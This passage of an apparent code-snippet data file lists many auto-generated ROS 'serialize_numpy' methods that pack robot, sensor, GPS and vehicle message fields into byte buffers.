str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_ih2B().pack(_x.rcvTOW, _x.week, _x.numSV, _x.reserved1))\n length = len(self.sv)\n buff.write(_struct_I.pack(length))\n for val1 in self.sv:\n _x = val1\n buff.write(_get_struct_2dfB2bB().pack(_x.cpMes, _x.prMes, _x.doMes, _x.sv, _x.mesQI, _x.cno, _x.lli))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_6d2IB().pack(_x.position.x, _x.position.y, _x.position.z, _x.position.roll, _x.position.pitch, _x.position.yaw, _x.position.stamp.secs, _x.position.stamp.nsecs, _x.is_Known))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.canmsg\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_Bf2B2f2B2fBf().pack(_x.track_id, _x.track_lat_rate, _x.track_group_changed, _x.track_status, _x.track_angle, _x.track_range, _x.track_bridge_object, _x.track_rolling_count, _x.track_width, _x.track_range_accel, _x.track_med_range_mode, _x.track_range_rate))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self.time\n buff.write(_get_struct_d().pack(_x))\n length = len(self.q_target)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.q_target.tostring())\n length = len(self.qd_target)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.qd_target.tostring())\n length = len(self.qdd_target)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.qdd_target.tostring())\n length = len(self.i_target)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.i_target.tostring())\n length = len(self.m_target)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.m_target.tostring())\n length = len(self.q_actual)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.q_actual.tostring())\n length = len(self.qd_actual)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.qd_actual.tostring())\n length = len(self.i_actual)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.i_actual.tostring())\n length = len(self.tool_acc_values)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.tool_acc_values.tostring())\n length = len(self.tcp_force)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.tcp_force.tostring())\n length = len(self.tool_vector)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.tool_vector.tostring())\n length = len(self.tcp_speed)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.tcp_speed.tostring())\n _x = self.digital_input_bits\n buff.write(_get_struct_d().pack(_x))\n length = len(self.motor_temperatures)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.motor_temperatures.tostring())\n _x = self\n buff.write(_get_struct_3d().pack(_x.controller_timer, _x.test_value, _x.robot_mode))\n length = len(self.joint_modes)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.joint_modes.tostring())\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self.id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.line)\n buff.write(_struct_I.pack(length))\n for val1 in self.line:\n _x = val1\n buff.write(_get_struct_4if().pack(_x.x1, _x.y1, _x.x2, _x.y2, _x.color))\n length = len(self.circle)\n buff.write(_struct_I.pack(length))\n for val1 in self.circle:\n _x = val1\n buff.write(_get_struct_3if().pack(_x.x, _x.y, _x.radius, _x.color))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_2ib6d12B().pack(_x.Timestamp_sec, _x.Timestamp_nsec, _x.IdModulo, _x.InputVolA, _x.InputVolB, _x.InputCorrA, _x.InputCorrB, _x.OutputAnlg1, _x.OutputAnlg2, _x.InputDig1, _x.InputDig2, _x.InputDig3, _x.InputDig4, _x.OutputDig1, _x.OutputDig2, _x.OutputDig3, _x.OutputDig4, _x.OutputDig5, _x.OutputDig6, _x.OutputDig7, _x.OutputDig8))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n buff.write(_struct_B.pack(self.type))\n _x = self.model\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.head_version\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.body_version\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.arm_version\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_2B3i.pack(_x.has_laser, _x.has_extended_arms, _x.number_of_legs, _x.number_of_arms, _x.number_of_hands))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n buff.write(self.thumb.tostring())\n buff.write(self.index.tostring())\n buff.write(self.middle.tostring())\n buff.write(self.ring.tostring())\n buff.write(self.little.tostring())\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.red_u)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.red_u.tostring())\n length = len(self.red_v)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.red_v.tostring())\n length = len(self.yellow_u)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.yellow_u.tostring())\n length = len(self.yellow_v)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.yellow_v.tostring())\n length = len(self.green_u)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.green_u.tostring())\n length = len(self.green_v)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.green_v.tostring())\n length = len(self.purple_u)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.purple_u.tostring())\n length = len(self.purple_v)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.purple_v.tostring())\n length = len(self.orange_u)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.orange_u.tostring())\n length = len(self.orange_v)\n buff.write(_struct_I.pack(length))\n pattern = '<%sd'%length\n buff.write(self.orange_v.tostring())\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_12d2f3d().pack(_x.position.x, _x.position.y, _x.position.z, _x.approach.x, _x.approach.y, _x.approach.z, _x.binormal.x, _x.binormal.y, _x.binormal.z, _x.axis.x, _x.axis.y, _x.axis.z, _x.width.data, _x.score.data, _x.sample.x, _x.sample.y, _x.sample.z))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_9f.pack(_x.c0.x, _x.c0.y, _x.c0.z, _x.c1.x, _x.c1.y, _x.c1.z, _x.c2.x, _x.c2.y, _x.c2.z))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_3B.pack(_x.gear, _x.front_diff, _x.rear_diff))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.polygons)\n buff.write(_struct_I.pack(length))\n for val1 in self.polygons:\n _v3 = val1.stamp\n _x = _v3\n buff.write(_struct_2I.pack(_x.secs, _x.nsecs))\n buff.write(_struct_I.pack(val1.ID))\n buff.write(val1.parameter.tostring())\n length = len(val1.score)\n buff.write(_struct_I.pack(length))\n for val2 in val1.score:\n _x = val2\n buff.write(_struct_If.pack(_x.ID, _x.prob))\n length = len(val1.polyline)\n buff.write(_struct_I.pack(length))\n for val2 in val1.polyline:\n _x = val2\n buff.write(_struct_3f.pack(_x.x, _x.y, _x.edge_prob))\n length = len(val1.features)\n buff.write(_struct_I.pack(length))\n for val2 in val1.features:\n _x = val2\n buff.write(_struct_3fI.pack(_x.x, _x.y, _x.z, _x.ID))\n _x = val1.energy\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_struct_f.pack(val1.weight))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_6d2I2iB().pack(_x.x, _x.y, _x.z, _x.yaw, _x.v_des, _x.a_des, _x.t_start.secs, _x.t_start.nsecs, _x.duration.secs, _x.duration.nsecs, _x.relative))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.base.header.seq, _x.base.header.stamp.secs, _x.base.header.stamp.nsecs))\n _x = self.base.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_5f.pack(_x.base.cell_width, _x.base.cell_height, _x.base.position.x, _x.base.position.y, _x.base.position.z))\n length = len(self.base.points)\n buff.write(_struct_I.pack(length))\n for val1 in self.base.points:\n _x = val1\n buff.write(_struct_3f.pack(_x.x, _x.y, _x.z))\n length = len(self.base.intensity)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(self.base.intensity.tostring())\n buff.write(_struct_b.pack(self.base.cost))\n _x = self.base.label\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_2f.pack(_x.mean_height, _x.mean_intensity))\n except struct.error as se: self._check_types(se)\n except TypeError as te: self._check_types(te)", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_struct_B12d.pack(_x.visible, _x.x, _x.y, _x.z, _x.u, _x.v, _x.w, _x.phi, _x.theta, _x.psi, _x.p, _x.q, _x.r))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(_x))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(_x))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_b7d().pack(_x.decision, _x.distance, _x.oriX, _x.oriY, _x.oriZ, _x.placX, _x.placY, _x.placZ))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n buff.write(_get_struct_i().pack(self.numberOfTSPTurtles))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.cmd\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.cat\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n if python3:\n buff.write(struct.pack('<I%sB'%length, length, *_x))\n else:\n buff.write(struct.pack('<I%ss'%length, length, _x))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(_x))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(_x))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_I3f2d13fH().pack(_x.sample_count, _x.ekf_roll, _x.ekf_pitch, _x.ekf_yaw, _x.ekf_lat, _x.ekf_lon, _x.ekf_alt, _x.ekf_vN, _x.ekf_vE, _x.ekf_vD, _x.ekf_vX, _x.ekf_vY, _x.ekf_vZ, _x.rad_gyro_X, _x.rad_gyro_Y, _x.rad_gyro_Z, _x.angular_acc_X, _x.angular_acc_Y, _x.angular_acc_Z, _x.alt_DVL))\n _x = self.dvl_error_code\n length = len(_x)\n # - if encoded as a list instead, serialize as bytes instead of string\n if type(_x) in [list, tuple]:\n buff.write(struct.Struct('<I%sB'%length).pack(length, *_x))\n else:\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_B9f2i7f().pack(_x.flag_to_check, _x.imu_deg_gyro_X, _x.imu_deg_gyro_Y, _x.imu_deg_gyro_Z, _x.imu_mag_X, _x.imu_mag_Y, _x.imu_mag_Z, _x.imu_acc_X, _x.imu_acc_Y, _x.imu_acc_Z, _x.gps_lat, _x.gps_lon, _x.gps_alt, _x.gps_vN, _x.gps_vE, _x.gps_vD, _x.dvl_vX, _x.dvl_vY, _x.dvl_vZ))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_2I2d4fh2B.pack(_x.date, _x.time, _x.longitude_RTK, _x.latitude_RTK, _x.height_above_sea_RTK, _x.velocity_north, _x.velocity_east, _x.velocity_ground, _x.yaw, _x.position_flag, _x.yaw_flag))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.Struct('<I%ss'%length).pack(length, _x))\n _x = self\n buff.write(_get_struct_q6d().pack(_x.control.mode, _x.control.duty_cycle, _x.control.current, _x.control.brake, _x.control.speed, _x.control.position, _x.control.servo))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_14id2i.pack(_x.lnid, _x.did, _x.blid, _x.flid, _x.bnid, _x.fnid, _x.jct, _x.blid2, _x.blid3, _x.blid4, _x.flid2, _x.flid3, _x.flid4, _x.clossid, _x.span, _x.lcnt, _x.lno))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_2I4d().pack(_x.h_min, _x.h_max, _x.s_min, _x.s_max, _x.v_min, _x.v_max))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_H2BiIbB4H2B3I().pack(_x.mask, _x.dynModel, _x.fixMode, _x.fixedAlt, _x.fixedAltVar, _x.minElev, _x.drLimit, _x.pDop, _x.tDop, _x.pAcc, _x.tAcc, _x.staticHoldThresh, _x.dgpsTimeOut, _x.reserved2, _x.reserved3, _x.reserved4))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n length = len(self.cnt)\n buff.write(_struct_I.pack(length))\n for val1 in self.cnt:\n _v7 = val1.header\n buff.write(_get_struct_I().pack(_v7.seq))\n _v8 = _v7.stamp\n _x = _v8\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n _x = _v7.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_get_struct_i().pack(val1.devadd))\n _v9 = val1.now\n _x = _v9\n buff.write(_get_struct_2I().pack(_x.secs, _x.nsecs))\n buff.write(_get_struct_I().pack(val1.encounter))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_struct_B2i2B.pack(_x.partial_view, _x.resolution, _x.type, _x.use_simple_occlusion, _x.add_point_colors))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(_x))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(_x))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_2i16dih().pack(_x.Timestamp_sec, _x.Timestamp_nsec, _x.Roll, _x.Pitch, _x.Yaw, _x.Wx, _x.Wy, _x.Wz, _x.AcelX, _x.AcelY, _x.AcelZ, _x.VelN, _x.VelE, _x.VelZ, _x.GPSLong, _x.GPSLat, _x.GPSAlt, _x.Temp, _x.IMUTime, _x.BITStatus))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_get_struct_I().pack(self.robot_id.id))\n _x = self.robot_id.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_3I().pack(_x.agv_msg.header.seq, _x.agv_msg.header.stamp.secs, _x.agv_msg.header.stamp.nsecs))\n _x = self.agv_msg.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n buff.write(_get_struct_I().pack(self.agv_msg.vehicle_id.id))\n _x = self.agv_msg.vehicle_id.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_21f().pack(_x.agv_msg.left_size, _x.agv_msg.right_size, _x.agv_msg.front_size, _x.agv_msg.rear_size, _x.agv_msg.min_height, _x.agv_msg.max_height, _x.agv_msg.payload, _x.agv_msg.max_pos_x_vel, _x.agv_msg.max_neg_x_vel, _x.agv_msg.max_pos_x_acc, _x.agv_msg.max_neg_x_acc, _x.agv_msg.max_pos_y_vel, _x.agv_msg.max_neg_y_vel, _x.agv_msg.max_pos_y_acc, _x.agv_msg.max_neg_y_acc, _x.agv_msg.max_pos_ang_vel, _x.agv_msg.max_neg_ang_vel, _x.agv_msg.velocity_control_sensitivity, _x.agv_msg.min_turning_radius, _x.agv_msg.batt_capacity, _x.agv_msg.batt_max_voltage))\n _x = self.agv_msg.vehicle_type\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self.agv_msg.vendor\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n length = len(self.agv_msg.action_capability)\n buff.write(_struct_I.pack(length))\n for val1 in self.agv_msg.action_capability:\n _x = val1\n buff.write(_get_struct_2B().pack(_x.category, _x.action))\n length = len(val1.attributes)\n buff.write(_struct_I.pack(length))\n for val2 in val1.attributes:\n _x = val2.type\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.name\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val2.value\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = val1.description\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self\n buff.write(_get_struct_3I().pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))\n _x = self.header.frame_id\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_3B4f2h3B().pack(_x.MatchMode, _x.MatchType, _x.TestMode, _x.pointA.x, _x.pointA.y, _x.pointB.x, _x.pointB.y, _x.angleA, _x.angleB, _x.idA, _x.idB, _x.kickforce))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n _x = self.group\n length = len(_x)\n if python3 or type(_x) == unicode:\n _x = _x.encode('utf-8')\n length = len(_x)\n buff.write(struct.pack('<I%ss'%length, length, _x))\n _x = self\n buff.write(_get_struct_2B().pack(_x.rand_start, _x.current_start))\n length = len(self.start_pos)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(self.start_pos.tostring())\n buff.write(_get_struct_B().pack(self.rand_target))\n length = len(self.target_pos)\n buff.write(_struct_I.pack(length))\n pattern = '<%sf'%length\n buff.write(self.target_pos.tostring())\n _x = self\n buff.write(_get_struct_3Bb().pack(_x.execute, _x.wait, _x.ret_plan, _x.ret_fps))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(locals().get('_x', self)))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), str(locals().get('_x', self)))))", "def serialize_numpy(self, buff, numpy):\n try:\n buff.write(_struct_B.pack(self.success))\n except struct.error as se: self._check_types(struct.error(\"%s: '%s' when writing '%s'\" % (type(se), str(se), str(_x))))\n except TypeError as te: self._check_types(ValueError(\"%s: '%s' when writing '%s'\" % (type(te), str(te), 